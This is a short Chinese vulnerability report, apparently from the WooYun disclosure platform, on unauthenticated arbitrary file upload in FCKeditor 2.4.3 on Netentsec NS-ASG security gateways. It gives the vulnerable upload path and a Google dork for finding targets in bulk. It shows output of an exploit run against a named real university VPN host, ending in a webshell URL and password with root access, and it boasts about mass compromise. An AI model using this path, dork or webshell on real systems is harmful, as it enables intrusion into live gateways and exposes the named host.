无需登录,直接getshell。。。。太爽了...
https://目标域名/admin/fckeditor/_whatsnew.html
版本Version 2.4.3
ps (乌云好像传不了图片了?)
fckeditor在此版本下,可以任意上传文件,直接造成代码执行,我已经写好exp了
漏洞点在/admin/fckeditor/editor/filemanager/upload/php/upload.php?type=Media
自己分析吧! <2.4.3都有此问题了
我已经写好exp了。。。
可以批量拿网康应用网关的shell了,都是root。。。
谷歌稍微找下吧 intitle:网康 NS-ASG 应用安全网关
G:\wamp\php>php wk.php vpn.lib.tju.edu.cn
锘
+--------------------------------------------------------------+
NS-ASG Getshell Exploit
+--------------------------------------------------------------+
Shell: https://vpn.lib.tju.edu.cn/vpnweb/userfiles/media/index(3).php password
: cmd
都是root 。。